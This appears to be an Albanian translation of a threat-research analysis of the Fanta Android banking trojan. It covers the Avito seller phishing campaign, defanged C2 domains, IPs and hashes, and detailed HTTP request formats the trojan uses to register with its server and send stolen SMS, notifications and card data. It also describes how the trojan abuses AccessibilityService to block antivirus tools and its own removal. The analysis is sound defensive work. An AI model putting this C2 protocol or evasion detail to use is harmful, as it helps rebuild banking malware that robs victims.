Shkruaj, Fanta: taktikë e re e trojanit të vjetër Android

Shkruaj, Fanta: taktikë e re e trojanit të vjetër Android

Një herë do të donit të shisnit diçka në Avito dhe, duke publikuar një përshkrim të detajuar të produktit tuaj (për shembull, një modul memorie), do të merrni një mesazh të tillë:

Shkruaj, Fanta: taktikë e re e trojanit të vjetër AndroidDuke hapur lidhjen, do të shihni një faqe të dukshme mjaft të pafajshme, që njofton juve, një shitës të lumtur dhe të suksesshëm, për përfundimin e blerjes:

Shkruaj, Fanta: taktikë e re e trojanit të vjetër Android
Pasi keni klikuar butonin “Vazhdo”, njĂ« skedari APK me ikonĂ«n dhe emrin qĂ« frymĂ«zojnĂ« besim do tĂ« shkarkohet nĂ« pajisjen tuaj Android. Keni instaluar aplikacionin, i cili pĂ«r njĂ« arsye tĂ« panjohur kĂ«rkoi tĂ« drejtat AccessibilityService, pastaj shfaqeshin dhe shuheshin shpejt disa dritare dhe
 gjithçka.

Ju hyni pĂ«r tĂ« kontrolluar bilancin tuaj, por aplikacioni juaj bankar pĂ«r njĂ« arsye tĂ« panjohur pĂ«rsĂ«ri kĂ«rkon tĂ« dhĂ«nat e kartĂ«s tuaj. Pas futjes sĂ« tĂ« dhĂ«nave ndodh njĂ« e keqe: pĂ«r njĂ« arsye qĂ« akoma nuk e kuptoni, paratĂ« fillojnĂ« tĂ« zhduken nga llogaria juaj. Tentoni tĂ« zgjidhni problemin, por telefoni juaj bĂ«n rezistencĂ«: ai vetĂ« klikon butonat “Mbrapa” dhe “ShtĂ«pi”, nuk ndizet dhe nuk lejon aktivizimin e asnjĂ« mase mbrojtĂ«se. PĂ«rfundimisht, ju e gjeni veten pa para, produkti juaj nuk Ă«shtĂ« shitur, jeni nĂ« ngatĂ«rrim dhe pyesni veten: çfarĂ« ndodhi?

Përgjigjja është e thjeshtë: ju u bëtë viktimë e trojanit Android Fanta, i familjes Flexnet. Si ndodhi që ndodhi kështu? Tani do ta shpjegojmë.

Autorët: Andrej Polovinkin, specialist i ri në analizën e kodeve të dëmshme, Ivan Pisarjov, specialist në analizën e kodeve të dëmshme.

Pak statistika

PĂ«r herĂ« tĂ« parĂ«, familja e trojanĂ«ve Android Flexnet u bĂ« e njohur nĂ« vitin 2015. GjatĂ« njĂ« periudhe tĂ« mjaftueshme aktiviteti, familja u zgjerua nĂ« disa nĂ«nfamilje: Fanta, Limebot, Lipton etj. TrojanĂ«t, si dhe infrastruktura e lidhur, nuk qĂ«ndrojnĂ« nĂ« vend: po zhvillohen skema tĂ« reja efektive shpĂ«rndarjeje — nĂ« rastin tonĂ« faqe phishing me cilĂ«si tĂ« lartĂ«, tĂ« orientuara ndaj pĂ«rdoruesve-shitĂ«s specifikĂ«, dhe zhvilluesit e trojanĂ«ve ndjekin trendet e modĂ«s nĂ« shkruarjen e viruseve — duke shtuar funksionalitete tĂ« reja qĂ« lejojnĂ« tĂ« vidhen mĂ« shpejt paratĂ« nga pajisjet e infektuara dhe tĂ« anashkalohen mekanizmat e mbrojtjes.

Kampanja e pĂ«rshkruar nĂ« kĂ«tĂ« artikull Ă«shtĂ« e orientuar ndaj pĂ«rdoruesve nga Rusia, njĂ« numĂ«r i vogĂ«l i pajisjeve tĂ« infektuara Ă«shtĂ« regjistruar nĂ« UkrainĂ«, edhe mĂ« pak — nĂ« Kazakistan dhe Bjellorrusi.

MegjithĂ«se Flexnet ka qenĂ« nĂ« arenĂ«n e trojaneve Android pĂ«r mĂ« shumĂ« se 4 vjet dhe Ă«shtĂ« studiuar nĂ« detaje nga shumĂ« kĂ«rkues, ai Ă«shtĂ« ende nĂ« formĂ« tĂ« mirĂ«. Duke filluar nga janari 2019, shuma potenciale e dĂ«mit Ă«shtĂ« mbi 35 milion rubla — dhe kjo Ă«shtĂ« vetĂ«m pĂ«r kampanjat nĂ« Rusi. NĂ« vitin 2015, versionet e ndryshme tĂ« kĂ«tij trojanii Android u shitĂ«n nĂ« forumin e nĂ«nkulturĂ«s, ku gjithashtu mund tĂ« gjendej kodi burimor i trojanit me njĂ« pĂ«rshkrim tĂ« detajuar. Kjo do tĂ« thotĂ« se statistikat e dĂ«mit nĂ« botĂ« janĂ« edhe mĂ« mbresĂ«lĂ«nĂ«se. NjĂ« shifĂ«r e mirĂ« pĂ«r njĂ« tĂ« moshuar si ai, apo jo?

Shkruaj, Fanta: taktikë e re e trojanit të vjetër Android

Nga shitja në mashtrim

Siç shihet nĂ« ekranin e mĂ«parshĂ«m tĂ« faqes sĂ« phishing pĂ«r shĂ«rbimin e internetit pĂ«r shpallje Avito, ajo ishte pĂ«rgatitur pĂ«r njĂ« viktimĂ« specifike. Sipas dukjes, kriminelĂ«t po pĂ«rdorin njĂ« nga parserĂ«t e Avito, qĂ« nxjerr numrin e telefonit dhe emrin e shitĂ«sit, si dhe pĂ«rshkrimin e produktit. Pas hapjes sĂ« faqes dhe pĂ«rgatitjes sĂ« dosjes APK, viktimĂ«s i dĂ«rgohet njĂ« mesazh SMS me emrin e saj dhe lidhjen nĂ« faqen e phishing, e cila pĂ«rmban pĂ«rshkrimin e produktit tĂ« saj dhe shumĂ«n e marrĂ« nga "shitja" e produktit. Duke klikuar butonin, pĂ«rdoruesi merr njĂ« dosje APK tĂ« dĂ«mshme — Fanta.

Studimi i domeneve shcet491[.]ru tregoi se ai është deleguar në serverët DNS të kompanisë Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Skeda e zonës së domenit përmban rekorde që tregojnë Adresa IP 31.220.23[.]236, 31.220.23[.]243 dhe 31.220.23[.]235. Megjithatë, rekordi kryesor burimor i domenit (A-record) tregon për një server me adresën IP 178.132.1[.]240.

Adresa IP 178.132.1[.]240 ndodhet në Holandë dhe i përket hostit WorldStream. Adresat IP 31.220.23[.]235, 31.220.23[.]236 dhe 31.220.23[.]243 ndodhen në Mbretërinë e Bashkuar dhe i përkasin serverit të hostimit virtual HOSTINGER. Si regjistrues përdoret openprov-ru. Në adresën IP 178.132.1[.]240 gjithashtu u regjistruan domenet:

  • sdelka-ru[.]ru
  • tovar-av[.]ru
  • av-tovar[.]ru
  • ru-sdelka[.]ru
  • shcet382[.]ru
  • sdelka221[.]ru
  • sdelka211[.]ru
  • vyplata437[.]ru
  • viplata291[.]ru
  • perevod273[.]ru
  • perevod901[.]ru

Duhet të theksohet se pothuajse të gjitha domenet kishin lidhje të disponueshme në formatin e mëposhtëm:

http://(www.){0,1}/[0-9]{7}

Ky model përfshin gjithashtu lidhjen nga mesazhi SMS. Sipas të dhënave historike, është zbuluar se një domeni i përkiste disa lidhjeve sipas modelit të mësipërm, që tregon për përdorimin e një domeni për përhapjen e trojanit te disa viktima.

Le tĂ« shkojmĂ« pak pĂ«rpara: si server menaxhues, trojani i shkarkuar nga lidhja nĂ« SMS pĂ«rdor adresĂ«n onuseseddohap[.]club. Ky domain u regjistrua mĂ« 12-03-2019, dhe nga 29-04-2019 kishte ndĂ«rveprime tĂ« aplikacioneve APK me kĂ«tĂ« domain. Duke u bazuar nĂ« tĂ« dhĂ«nat e marra nga VirusTotal, gjithsej 109 aplikacione ndĂ«rveprim tĂ« kĂ«tij serveri. Ky domain ishte i vendosur nĂ« IP-adresĂ«n 217.23.14[.]27, e cila gjendet nĂ« HolandĂ« dhe i pĂ«rket hostit WorldStream. Si regjistrues pĂ«rdoret namecheap. NĂ« kĂ«tĂ« IP-adresĂ« gjithashtu ishin regjistruar domainet bad-racoon[.]club (qĂ« nga 25-09-2018) dhe bad-racoon[.]live (qĂ« nga 25-10-2018). Me domainin bad-racoon[.]club kanĂ« ndĂ«rvepruar mĂ« shumĂ« se 80 APK-fajla, me bad-racoon[.]live — mĂ« shumĂ« se 100.

Në përgjithësi, plani i sulmit duket kështu:

Shkruaj, Fanta: taktikë e re e trojanit të vjetër Android

ÇfarĂ« ka Fanta nĂ«n kapak?

Si shumë trojanët e tjerë të Android, Fanta është në gjendje të lexojë dhe dërgojë mesazhe SMS, të bëjë kërkesa USSD, të shfaqë dritare mbi aplikacione (përfshirë ato bankare). Megjithatë, në arsenalin e funksioneve të këtij grupi ka ardhur një risi: Fanta ka filluar të përdorë AccessibilityService për qëllime të ndryshme: leximi i përmbajtjes së njoftimeve të aplikacioneve të tjera, parandalimi i zbulesës dhe ndalimi i ekzekutimit të trojanit në pajisjen e infektuar, etj. Fanta punon në të gjitha versionet e Android që nuk janë më të vogla se 4.4. Në këtë artikull ne do të shqyrtojmë më në imtësi mostrat e ardhshme të Fanta:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Menjëherë pas nisjes

Menjëherë pas nisjes, trojani fsheh ikonën e tij. Funksionimi i aplikacionit është i mundur vetëm nëse emri i pajisjes së infektuar nuk ndodhet në listën:

  • android_x86
  • VirtualBox
  • Nexus 5X(bullhead)
  • Nexus 5(razor)

Kjo kontroll bĂ«het nĂ« shĂ«rbimin kryesor tĂ« trojanit — MainService. GjatĂ« fillimit tĂ« parĂ«, inicializohen parametrat e konfigurimit tĂ« aplikacionit me vlerat e paracaktuara (pĂ«r formatin e ruajtjes sĂ« tĂ« dhĂ«nave tĂ« konfigurimit dhe kuptimin e tyre do tĂ« flasim mĂ« vonĂ«), si dhe regjistrimi i pajisjes sĂ« infektuar nĂ« serverin menaxhues. Servisi do tĂ« dĂ«rgojĂ« njĂ« kĂ«rkesĂ« HTTP POST me tipin e mesazhit register_bot dhe informacionin rreth pajisjes sĂ« infektuar (versioni i Android, IMEI, numrin e telefonit, emrin e operatorit dhe kodin e vendit ku Ă«shtĂ« regjistruar operatori). Adresa shĂ«rben si server menaxhues hXXp://onuseseddohap[.]club/controller.php. NĂ« pĂ«rgjigje, serveri dĂ«rgon njĂ« mesazh qĂ« pĂ«rmban fushat bot_id, bot_pwd, server — kĂ«to vlera aplikacioni i ruan si parametra tĂ« serverit CnC. Parametri server Ă«shtĂ« opsional nĂ«se fusha nuk Ă«shtĂ« marrĂ«: Fanta pĂ«rdor adresĂ«n e regjistrimit — hXXp://onuseseddohap[.]club/controller.php. Funksioni i ndryshimit tĂ« adresĂ«s CnC mund tĂ« pĂ«rdoret pĂ«r tĂ« zgjidhur dy probleme: ndarjen e baraspeshuar tĂ« ngarkesĂ«s midis serverĂ«ve tĂ« shumtĂ« (nĂ« rastin e njĂ« numri tĂ« madh tĂ« pajisjeve tĂ« infektuara, ngarkesa nĂ« serverin e uebit tĂ« paoptimizuar mund tĂ« jetĂ« e lartĂ«), si dhe pĂ«r tĂ« pĂ«rdorur njĂ« server alternativ nĂ« rast dĂ«shtimi tĂ« njĂ«rit nga shĂ«rbimet CnC.

Nëse gjatë dërgimit të kërkesës ndodh një gabim, trojani do të përsërisë procesin e regjistrimit pas 20 sekondash.

Pas regjistrimit të suksesshëm të pajisjes, Fanta do të shfaqë këtë mesazh për përdoruesin:

Shkruaj, Fanta: taktikë e re e trojanit të vjetër Android
ShĂ«nim i rĂ«ndĂ«sishĂ«m: shĂ«rbimi me emrin Siguria e sistemit — emri i shĂ«rbimit tĂ« trojanit, dhe pas klikimit nĂ« butonin OK do tĂ« hapet njĂ« dritare me cilĂ«simet e Accessibility tĂ« pajisjes sĂ« infektuar, pĂ«r nga ku pĂ«rdoruesi duhet tĂ« japĂ« vetĂ« tĂ« drejtat e Accessibility pĂ«r shĂ«rbimin e dĂ«mshĂ«m:

Shkruaj, Fanta: taktikë e re e trojanit të vjetër Android
Sa herë që përdoruesi aktivizon AccessibilityService, Fanta fiton akses në përmbajtjen e dritareve të aplikacioneve dhe veprimeve që kryhen në to:

Shkruaj, Fanta: taktikë e re e trojanit të vjetër Android
Menjëherë pas marrjes së të drejtave të Accessibility, trojani kërkon të drejtat e administratorit dhe të drejtat për leximin e njoftimeve:

Shkruaj, Fanta: taktikë e re e trojanit të vjetër Android
Me ndihmën e AccessibilityService, aplikacioni imiton shtypjet e çelësave, duke i dhënë kështu vetes të gjitha të drejtat e nevojshme.

Fanta krijon disa ekzemplarë të bazës së të dhënave (të cilat do të përshkruhen më vonë), të nevojshme për ruajtjen e të dhënave konfiguruese, si dhe informacionit të mbledhur gjatë procesit për pajisjen e infektuar. Për të dërguar informacionin e mbledhur, trojani krijon një detyrë të përsëritur, e cila është e destinuar për ngarkimin e fushave nga baza e të dhënave dhe për të marrë komandën nga serveri drejtues. Intervali i qasjes në CnC vendoset në varësi të versionit të Android: në rastin e 5.1, intervali do të jetë 10 sekonda, përndryshe 60 sekonda.

Për të marrë komandën, Fanta bën një kërkesë GetTask në serverin drejtues. Në përgjigje, CnC mund të dërgojë një nga këto komanda:

EkipaPërshkrimi
0Dërgo një mesazh SMS
1Kryej një telefonatë ose komandë USSD
2Përditëso parametrin interval
3Përditëso parametrin intercept
6Përditëso parametrin smsManager
9Filloni mbledhjen e mesazheve SMS
11Rivendosni telefonin në parametrat e fabrikës
12Aktivizimi/Deaktivizimi i regjistrimit të krijimit të dritareve të dialogut

Fanta gjithashtu mbledh njoftime nga 70 aplikacione bankash, sisteme pagash të shpejta dhe portofolesh elektronikë dhe i ruan ato në databazën e saj.

Ruajtja e parametrave të konfigurimit

PĂ«r ruajtjen e parametrave tĂ« konfigurimit, Fanta pĂ«rdor qasjen standarde pĂ«r platformĂ«n Android — Preferences-file. CilĂ«simet do tĂ« ruhen nĂ« njĂ« skedar me emrin settings. PĂ«rshkrimi i parametrave tĂ« ruajtur ndodhet nĂ« tabelĂ«n mĂ« poshtĂ«.

EmriVlera e paracaktuarVlerat e mundshmePërshkrimi
id0IntegerIdentifikuesi i botit
serverhXXp://onuseseddohap[.]club/URLAdresa e serverit ndihmës
pwd—StringFjala kalim pĂ«r serverin
interval20IntegerIntervali kohor. Tregon sa duhet të vonohet kryerja e detyrave të mëposhtme:
  • Kur dĂ«rgohet njĂ« kĂ«rkesĂ« pĂ«r statusin e SMS-it tĂ« dĂ«rguar
  • Marrja e njĂ« komande tĂ« re nga serveri ndihmĂ«s

intercepttë gjithaall/telNumberNëse fusha është e barabartë me stringun të gjitha ose telNumber, atëherë SMS-i i marrë do të kapet nga aplikacioni dhe nuk do t'i shfaqet përdoruesit.
smsManager00/1Aktivizimi/Deaktivizimi i aplikacionit si marrës i SMS-ve si parazgjedhje
readDialogfalseTrue/falseAktivizimi/Deaktivizimi i regjistrimit të ngjarjeve AccessibilityEvent

Po ashtu, Fanta përdor skedarin smsManager:

EmriVlera e paracaktuarVlerat e mundshmePërshkrimi
pckg—StringEmri i menaxherit tĂ« SMS-ve tĂ« pĂ«rdorur

Ndërveprimi me databazat

Gjatë funksionimit të saj, trojan-i përdor dy databaza. Databaza me emrin a përdoret për ruajtjen e informacionit të ndryshëm të mbledhur nga telefoni. Databaza e dytë quhet fanta.db dhe përdoret për të ruajtur parametrat që janë përgjegjës për krijimin e dritareve phishing, të destinuara për mbledhjen e informacionit mbi kartat bankare.

Trojan-i përdor databazën a për ruajtjen e informacionit të mbledhur dhe regjistrimin e veprimeve të veta. Të dhënat ruhen në tabelën logs. Për krijimin e tabelës përdoret kërkesa SQL vijues:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Në databazë ndodhen të dhënat vijuese:

1. Regjistrimi i ndezjes së pajisjes së infektuar me mesazhin Telefoni u ndez!

2. Njoftimet nga aplikacionet. Mesazhi formohet sipas shabllonit vijues:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Të dhënat e kartave bankare nga format phishing të krijuara nga trojan-i. Parametri VIEW_NAME mund të jetë një nga listën:

  • AliExpress
  • Avito
  • Google Play
  • TĂ« ndryshme <%App Name%>

Mesazhi regjistrohet në formatin:

[]() Numri i kartës:; Data:/%; CVV:

4. Mesazhet SMS që hyjnë/dalin në format:

([<%Koha në formatin HH:mm:ss dd.MM.yyyy%>] Lloji: I Hyjshëm/I Dalshëm) <%Numri celular%>:<%Teksti SMS%>

5. Informacion mbi paketën që krijon dritaren në format:

(<%Emri i Paketës%>)<%Informacioni mbi Paketën%>

Shembujt e tabelës logs:

Shkruaj, Fanta: taktikë e re e trojanit të vjetër Android
Një nga funksionalitetet e Fanta është mbledhja e informacionit mbi kartat bankare. Mbledhja e të dhënave ndodh përmes krijimit të dritareve phishing gjatë hapjes së aplikacioneve bankare. Trojani krijon një dritare phishing vetëm një herë. Informacioni në lidhje me shfaqjen e dritares për përdoruesin ruhet në tabelë. settings në bazën e të dhënave fanta.db. Për krijimin e një baze të dhënash përdoret pyetja SQL si vijon:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Të gjitha fushat e tabelës settings për default inicializohen me vlerën 1 (krijoni një dritare phishing). Pasi përdoruesi të futë të dhënat e tij, vlera do të vendoset në 0. Shembujt e fushave të tabelës settings:

  • can_login — fusha pĂ«rgjigjet pĂ«r shfaqjen e formularit gjatĂ« hapjes sĂ« aplikacionit bankar
  • first_bank — nuk pĂ«rdoret
  • can_avito — fusha pĂ«rgjigjet pĂ«r shfaqjen e formularit gjatĂ« hapjes sĂ« aplikacionit Avito
  • can_ali — fusha pĂ«rgjigjet pĂ«r shfaqjen e formularit gjatĂ« hapjes sĂ« aplikacionit Aliexpress
  • can_another — fusha pĂ«rgjigjet pĂ«r shfaqjen e formularit gjatĂ« hapjes sĂ« çdo aplikacioni nga lista: Yula, Pandao, Drom Auto, KoshĂ«lek. Kartat zbritĂ«se dhe bonus, Aviasales, Booking, Trivago
  • can_card — fusha pĂ«rgjigjet pĂ«r shfaqjen e formularit gjatĂ« hapjes sĂ« Google Play

Interaksioni me serverin e menaxhimit

Ndërveprimi rrjetësor me serverin e menaxhimit ndodh përmes protokollit HTTP. Për punën me rrjetin, Fanta përdor bibliotekën e njohur Retrofit. Kërkesat dërgohen në adresën hXXp://onuseseddohap[.]club/controller.php. Adresa e serverit mund të ndryshohet gjatë regjistrimit në server. Në përgjigje nga serveri mund të arrijnë cookie. Fanta realizon kërkesat si vijon:

  • Regjistrimi i botit nĂ« serverin e menaxhimit ndodh njĂ« herĂ« nĂ« startimin e parĂ«. NĂ« server dĂ«rgohen tĂ« dhĂ«nat e mĂ«poshtme pĂ«r pajisjen e infektuar:
    · Cookie — cookie tĂ« marra nga serveri (vlera e paracaktuar — string i zbrazĂ«t)
    · mode — konstante string register_bot
    · prefix — konstante tĂ« numrave 2
    · version_sdk — formohet sipas kĂ«tij shembulli: <%Build.MODEL%> / <%Build.VERSION.RELEASE%>(Avit)
    · imei — IMEI i pajisjes sĂ« infektuar
    · country — kodi i vendit, ku Ă«shtĂ« regjistruar operatori, nĂ« formatin ISO
    · number — numri i telefonit
    · operator — emri i operatorit

    Shembuj i kërkesës dërguar në server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=register_bot&prefix=2&version_sdk=&imei=&country=&number=&operator=
    

    Në përgjigje të kërkesës, serveri duhet të kthejë një objekt JSON që përmban parametrat e mëposhtëm:
    · bot_id — identifikuesi i pajisjes sĂ« infektuar. NĂ«se bot_id Ă«shtĂ« 0, Fanta do tĂ« ekzekutojĂ« pĂ«rsĂ«ri kĂ«rkesĂ«n.
    · bot_pwd — password pĂ«r serverin.
    · server — adresa e serverit menaxhues. ParametĂ«r i opsional. NĂ«se parametri nuk Ă«shtĂ« i specifikuar, do tĂ« pĂ«rdoret adresa e ruajtur nĂ« aplikacion.

    Shembull i objektit JSON:

    {
        "response":[
       	 {
       		 "bot_id": ,
       		 "bot_pwd": ,
       		 "server": 
       	 }
        ],
        "status":"ok"
    }

  • KĂ«rkesa pĂ«r marrjen e komandĂ«s nga serveri. NĂ« server dĂ«rgohen tĂ« dhĂ«nat e mĂ«poshtme:
    · Cookie — cookie-t e pranuara nga serveri
    · bid — id e pajisjes sĂ« infektuar, qĂ« Ă«shtĂ« marrĂ« kur Ă«shtĂ« dĂ«rguar kĂ«rkesa register_bot
    · pwd — password pĂ«r serverin
    · divice_admin — fusha pĂ«rcakton nĂ«se janĂ« marrĂ« tĂ« drejtat e administratorit. NĂ«se janĂ« marrĂ« tĂ« drejtat e administratorit, fusha Ă«shtĂ« 1, pĂ«rndryshe 0
    · Accessibility — statusi i funksionimit tĂ« ShĂ«rbimit Accessibility. NĂ«se shĂ«rbimi Ă«shtĂ« aktivizuar, vlera Ă«shtĂ« 1, pĂ«rndryshe 0
    · SMSManager — tregon nĂ«se trojani Ă«shtĂ« aktiv si aplikacioni i paracaktuar pĂ«r marrjen e SMS-ve
    · screen — tregon se nĂ« çfarĂ« gjendjeje ndodhet ekrani. Vlera do tĂ« vendoset 1, nĂ«se ekrani Ă«shtĂ« aktiv, pĂ«rndryshe 0;

    Shembuj i kërkesës dërguar në server:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=getTask&bid=&pwd=&divice_admin=&Accessibility=&SMSManager=&screen=

    Në varësi të komandës, serveri mund të kthejë një objekt JSON me parametra të ndryshëm:

    · Ekipa Dërgo një mesazh SMS: Në parametrat përmban numrin e telefonit, tekstin e SMS-së dhe identifikuesin e mesazhit të dërguar. Identifikuesi përdoret kur dërgohet mesazhi në server me tipin setSmsStatus.

    {
        "response":
        [
       	 {
       		 "mode": 0,
       		 "sms_number": ,
       		 "sms_text": ,
       		 "sms_id": %SMS_ID%
       	 }
        ],
        "status":"ok"
    }

    · Ekipa Kryej një telefonatë ose komandë USSD: Numri i telefonit ose komanda arrin në trupin e përgjigjes.

    {
        "response":
        [
       	 {
       		 "mode": 1,
       		 "command": 
       	 }
        ],
        "status":"ok"
    }

    · Ekipa Ndrysho parametrin interval.

    {
        "response":
        [
       	 {
       		 "mode": 2,
       		 "interval": 
       	 }
        ],
        "status":"ok"
    }

    · Ekipa Ndrysho parametrin intercept.

    {
        "response":
        [
       	 {
       		 "mode": 3,
       		 "intercept": "all"/"telNumber"/
       	 }
        ],
        "status":"ok"
    }

    · Ekipa Ndrysho fushën SmsManager.

    {
        "response":
        [
       	 {
       		 "mode": 6,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

    · Ekipa Kryej grumbullimin e SMS-ve nga pajisja e infektuar.

    {
        "response":
        [
       	 {
       		 "mode": 9
       	 }
        ],
        "status":"ok"
    }

    · Ekipa Rivendosni telefonin në parametrat e fabrikës:

    {
        "response":
        [
       	 {
       		 "mode": 11
       	 }
        ],
        "status":"ok"
    }

    · Ekipa Ndrysho parametrin ReadDialog.

    {
        "response":
        [
       	 {
       		 "mode": 12,
       		 "enable": 0/1
       	 }
        ],
        "status":"ok"
    }

  • DĂ«rgimi i mesazhit me tipin setSmsStatus. KĂ«rkesa bĂ«het pas ekzekutimit tĂ« komandĂ«s DĂ«rgo njĂ« mesazh SMS. KĂ«rkesa duket kĂ«shtu:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • DĂ«rgimi i pĂ«rmbajtjes sĂ« bazĂ«s sĂ« tĂ« dhĂ«nave. NĂ« njĂ« kĂ«rkesĂ« dĂ«rgohet njĂ« rresht. NĂ« server dĂ«rgohen tĂ« dhĂ«nat e mĂ«poshtme:
    · Cookie — cookie-t e pranuara nga serveri
    · mode — konstante string setSaveInboxSms
    · bid — id e pajisjes sĂ« infektuar, qĂ« Ă«shtĂ« marrĂ« kur Ă«shtĂ« dĂ«rguar kĂ«rkesa register_bot
    · text — teksti nĂ« regjistrin aktual tĂ« DB (fusha d nga tabela logs nĂ« bazĂ«n e tĂ« dhĂ«nave a)
    · number — emri i regjistrit aktual tĂ« DB (fusha p nga tabela logs nĂ« bazĂ«n e tĂ« dhĂ«nave a)
    · sms_mode — vlera e numrit tĂ« plotĂ« (fusha m nga tabela logs nĂ« bazĂ«n e tĂ« dhĂ«nave a)

    Kërkesa duket kështu:

    POST /controller.php HTTP/1.1
    Cookie:
    Content-Type: application/x-www-form-urlencoded
    Host: onuseseddohap.club
    Connection: close
    Accept-Encoding: gzip, deflate
    User-Agent: okhttp/3.6.0
    
    mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Nëse dërgimi në server është i suksesshëm, rreshti do të fshihet nga tabela. Shembulli i objektit JSON që kthehet nga serveri:

    {
        "response":[],
        "status":"ok"
    }

Ndërveprimi me AccessibilityService

AccessibilityService Ă«shtĂ« realizuar pĂ«r tĂ« lehtĂ«suar pĂ«rdorimin e pajisjeve Android nga njerĂ«zit me kufizime. NĂ« shumicĂ«n e rasteve, pĂ«r tĂ« ndĂ«rvepruar me aplikacionin kĂ«rkohet ndĂ«rveprim fizik. AccessibilityService lejon qĂ« kjo tĂ« bĂ«het programatikisht. Fanta pĂ«rdor shĂ«rbimin pĂ«r tĂ« krijuar dritare tĂ« rreme nĂ« aplikacionet bankare dhe pĂ«r tĂ« penguar hapjen e ĐœĐ°ŃŃ‚Ń€ĐŸĐčkave tĂ« sistemit dhe disa aplikacioneve.

Duke pĂ«rdorur funksionalitetet e AccessibilityService, trojani monitoron ndryshimet e elementeve nĂ« ekranin e pajisjes sĂ« infektuar. Siç Ă«shtĂ« pĂ«rmendur mĂ« parĂ«, nĂ« cilĂ«simet e Fanta ka njĂ« parameter qĂ« pĂ«rgjigjet pĂ«r regjistrimin e operacioneve me dritaret dialogu — readDialog. NĂ«se ky parameter Ă«shtĂ« vendosur, do tĂ« shtohet informacion nĂ« bazĂ«n e tĂ« dhĂ«nave pĂ«r emrin dhe pĂ«rshkrimin e paketĂ«s qĂ« iniciuoi ngjarjen. Trojani kryen veprime tĂ« mĂ«poshtme kur ndodhin ngjarje:

  • Imiton shtypjen e çelsave prapa dhe nĂ« shtĂ«pi nĂ« rastin e:
    · nëse përdoruesi dëshiron të rinisë pajisjen e tij
    · nĂ«se pĂ«rdoruesi dĂ«shiron tĂ« fshijĂ« aplikacionin “Avito” ose tĂ« ndryshojĂ« tĂ« drejtat e aksesit
    · nĂ«se ka pĂ«rmendje pĂ«r aplikacionin “Avito” nĂ« faqe
    · kur hap aplikacionin “Google Play Mbrojtja”
    · kur hap faqet me cilësimet e AccessibilityService
    · kur shfaqet dritarja “Siguria e sistemit”
    · kur hap faqen me cilĂ«simet “Vizato mbi aplikacione tĂ« tjera”
    · kur hap faqen “Aplikacionet”, “Rikthimi dhe rivendosja”, “Rivendosja e tĂ« dhĂ«nave”, “Rivendosja e cilĂ«simeve”, “Paneli i zhvilluesve”, “AftĂ«si tĂ« veçanta”, “AftĂ«sitĂ« speciale”, “TĂ« drejta tĂ« veçanta”
    · nëse ngjarja është gjeneruar nga aplikacione të caktuara.

    Lista e aplikacioneve

    • android
    • Master Lite
    • Clean Master
    • Clean Master pĂ«r CPU x86
    • Menaxhimi i tĂ« drejtave tĂ« aplikacioneve Meizu
    • Siguria MIUI
    • Clean Master — Antivirus & Pastrimi i caches dhe mbeturinave
    • Kontrolli PrindĂ«ror dhe GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Siguria nĂ« Internet Beta
    • Virus Cleaner, Antivirus, Cleaner (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & mbrojtje falas 2019
    • Mobile Security MegaFon
    • AVG Protection pĂ«r Xperia
    • Siguria Mobili
    • Malwarebytes antivirus & mbrojtja
    • Antivirus pĂ«r Android 2019
    • Security Master — Antivirus, VPN, AppLock, Booster
    • AVG antivirus pĂ«r tabletin Huawei Menaxheri i Sistemit
    • Samsung Accessibility
    • Samsung Smart Manager
    • Security Master
    • Speed Booster
    • Dr.Web
    • Dr.Web Security Space
    • Dr.Web Qendra e Kontrollit tĂ« Mobile
    • Dr.Web Security Space Life
    • Dr.Web Qendra e Kontrollit tĂ« Mobile
    • Antivirus & Siguria Mobili
    • Kaspersky Internet Security: Antivirus dhe Mbrojtje
    • Kaspersky Battery Life: Kursyes & Booster
    • Kaspersky Endpoint Security — mbrojtje dhe menaxhim
    • AVG Antivirus falas 2019 – Mbrojtje pĂ«r Android
    • Antivirus Android
    • Norton Mobile Security dhe Antivirus
    • Antivirus, firewall, VPN, siguria mobile
    • Mobile Security: antivirus, VPN, mbrojtje nga vjedhja
    • Antivirus pĂ«r Android

  • NĂ«se gjatĂ« dĂ«rgimit tĂ« njĂ« mesazhi SMS nĂ« njĂ« numĂ«r tĂ« shkurtĂ«r kĂ«rkohet leja, Fanta imiton shtypjen nĂ« checkbox Kujto zgjedhjen dhe butonin dĂ«rgo.
  • Kur pĂ«rpiqet tĂ« shkĂ«putĂ« nga trojani tĂ« drejtat e administratorit, bllokon ekranin e telefonit.
  • Pengon shtimin e administratorĂ«ve tĂ« rinj.
  • NĂ«se aplikacioni antivirus dr.web ka zbuluar njĂ« kĂ«rcĂ«nim, Fanta imiton shtypjen nĂ« butonin injoro.
  • Trojani imiton shtypjen nĂ« butonin prapa dhe nĂ« shtĂ«pi, nĂ«se ngjarja Ă«shtĂ« gjeneruar nga aplikacioni Samsung Device Care.
